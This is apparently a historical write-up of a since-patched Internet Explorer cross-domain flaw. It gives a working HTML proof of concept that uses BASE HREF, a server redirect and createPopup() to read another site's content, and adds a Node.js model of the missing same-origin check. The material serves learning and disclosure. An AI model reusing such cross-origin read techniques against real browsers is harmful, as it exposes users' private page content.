This variation does not use the mhtml: protocol at all. Instead, it relies on a <BASE HREF> tag that points at a server-side redirect. A popup created with createPopup() that reloads itself inherits the redirected origin, and the opener's reference to the popup document survives that navigation, collapsing the domain boundary. At least one pixel of the popup must be visible on screen for it to work; hiding it entirely with zero dimensions breaks the trick.
<HTML>
<HEAD>
<TITLE>xDomain using just BASE HREF and createPopup</TITLE>
<BASE HREF="http://sapo/redir/">
</HEAD>
<BODY>
<FONT FACE="Tahoma" SIZE="2">
This variation <b>is not using</b> the <u>mHTML</u> protocol.<BR>
The trick is more or less similar to the xDomain variation of the LDY Spoof, but this time it does not need the mHTML protocol
at all, so it has nothing to do with the patch for mHTML. It still involves a server redirection.<BR><BR>
Differences with the other crossDomain:<BR>
1) No mHTML protocol used at all.<BR>
2) This one NEEDS to show the popup in order to work. At least one pixel of it (cPop.show(0,0,1,1)).
</FONT>
<SCRIPT>
// Create the IE popup; its document starts blank and is scriptable from this page.
var cPop=window.createPopup();
var doc=cPop.document;
// The deferred script makes the popup reload itself; the reload resolves against <BASE HREF>.
doc.body.innerHTML='.<SCRIPT DEFER>location.reload();<\/SCRIPT>';
// The popup must be visible (at least one pixel) or the trick fails.
cPop.show(0,300,200,200);
// Give the reload and the redirect time to complete, then read the now cross-domain
// content through the reference kept from before the navigation.
setTimeout("alert(doc.body.innerText)",5000);
</SCRIPT>
</BODY>
</HTML>
The <BASE HREF> repoints all relative navigation to the redirect server. When the popup calls location.reload() on itself, the reload request resolves against the base URL, and the server-side redirect sends it to a different domain. The popup's document now belongs to that other domain, but the parent page still holds a live reference to it (doc) and can read its content through innerText, which is what the delayed alert() in the PoC shows. The flaw is that the stale reference keeps working after the navigation instead of being re-checked against the document's new origin. The server-side redirect handler (redir1.asp) is part of the setup but is not shown here.
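To make the sequence concrete, here is an added example that is not part of the original PoC: a small Node.js model of the navigation the trick depends on and of the origin check the browser should have applied when the parent read back doc. The opener URL, the redirect target (bank.example) and the redirect table are constructed for the example; only the sapo base URL comes from the page, and the behaviour of the real redir1.asp is not shown here. The model follows redirect chains of any length, not just the single hop the PoC uses.

```javascript
// Added example (not part of the original PoC). Models the navigation the
// BASE HREF + createPopup trick relies on, and the same-origin check that
// should have blocked the final read. Hostnames other than "sapo" (from the
// page's BASE HREF) are constructed for this example.

// Constructed server-side redirect table standing in for the unseen redir1.asp:
// maps a requested URL to the Location the server answers with.
const REDIRECTS = {
  'http://sapo/redir/': 'http://bank.example/account',
};

// Resolve a navigation target the way a browser does: relative URLs are
// resolved against the document's <BASE HREF>, then redirects are followed.
// Returns the final URL and every URL visited along the way.
function resolveNavigation(target, baseHref, redirects = REDIRECTS, maxHops = 5) {
  let url = new URL(target, baseHref).href;
  const hops = [url];
  for (let i = 0; i < maxHops && redirects[url]; i++) {
    // A Location header may itself be relative; resolve it against the current URL.
    url = new URL(redirects[url], url).href;
    hops.push(url);
  }
  return { finalUrl: url, hops };
}

// Origin of a document: scheme://host:port of its URL. A blank document
// (about:blank) inherits the origin of the document that created it.
function documentOrigin(url, openerOrigin) {
  if (url === 'about:blank') return openerOrigin;
  return new URL(url).origin;
}

// The check that the IE bug skipped: after navigation, may the opener still
// read the popup document it holds a reference to?
function canOpenerRead(openerUrl, popupUrl) {
  const opener = new URL(openerUrl).origin;
  return documentOrigin(popupUrl, opener) === opener;
}

// Walk the PoC's sequence. The popup starts as about:blank (same origin as the
// opener, so readable), then location.reload() with an empty relative target
// resolves to the base URL and lands on the redirect target (different origin,
// so the read must be refused).
function simulatePoc(openerUrl, baseHref, redirects = REDIRECTS) {
  const before = canOpenerRead(openerUrl, 'about:blank');
  const nav = resolveNavigation('', baseHref, redirects);
  const after = canOpenerRead(openerUrl, nav.finalUrl);
  return { before, after, finalUrl: nav.finalUrl, hops: nav.hops };
}

// Constructed opener URL; the base href is the one from the page.
const demo = simulatePoc('http://attacker.example/poc.html', 'http://sapo/redir/');
console.log(JSON.stringify(demo, null, 2));
```

In this model the read is allowed before the reload and refused after it; the original IE behaviour corresponds to answering true both times, because the reference obtained while the popup was blank was never re-evaluated against the redirected document's origin.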
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.